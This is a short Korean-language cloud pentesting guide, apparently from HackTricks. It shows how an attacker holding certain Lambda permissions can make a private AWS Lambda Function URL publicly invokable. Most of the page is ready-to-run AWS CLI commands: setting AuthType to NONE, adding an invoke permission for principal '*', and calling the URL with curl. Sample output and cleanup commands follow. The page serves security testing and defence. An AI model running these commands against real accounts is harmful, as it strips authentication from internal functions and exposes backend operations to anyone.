AWS - Lambda Function URL Public Exposure (AuthType NONE + Public Invoke Policy)

Reading time: 2 minutes

Lambda Function URL를 Function URL AuthType을 NONE으로 전환하고 모든 사용자에게 lambda:InvokeFunctionUrl을 부여하는 resource-based policy를 연결하여 비공개 Lambda Function URL을 공개 무인증 엔드포인트로 바꿀 수 있습니다. 이는 내부 함수의 익명 호출을 가능하게 하며 민감한 백엔드 작업을 노출시킬 수 있습니다.

악용 방법

• 사전 요구사항: lambda:UpdateFunctionUrlConfig, lambda:CreateFunctionUrlConfig, lambda:AddPermission
• 리전: us-east-1

단계

1. 함수에 Function URL이 있는지 확인 (기본값은 AWS_IAM):

aws lambda create-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true

2. URL을 공개로 전환 (AuthType NONE):

aws lambda update-function-url-config --function-name $TARGET_FN --auth-type NONE

3. 인증되지 않은 주체가 접근할 수 있도록 resource-based policy 문을 추가:

aws lambda add-permission --function-name $TARGET_FN --statement-id ht-public-url --action lambda:InvokeFunctionUrl --principal "*" --function-url-auth-type NONE

4. URL을 가져와 자격증명 없이 호출:

URL=$(aws lambda get-function-url-config --function-name $TARGET_FN --query FunctionUrl --output text)
curl -sS "$URL"

영향

• Lambda 함수가 인터넷을 통해 익명으로 접근 가능해집니다.

예시 출력 (인증되지 않은 200)

HTTP 200
https://e3d4wrnzem45bhdq2mfm3qgde40rjjfc.lambda-url.us-east-1.on.aws/
{"message": "HackTricks demo: public Function URL reached", "timestamp": 1759761979, "env_hint": "us-east-1", "event_keys": ["version", "routeKey", "rawPath", "rawQueryString", "headers", "requestContext", "isBase64Encoded"]}

정리

aws lambda remove-permission --function-name $TARGET_FN --statement-id ht-public-url || true
aws lambda update-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true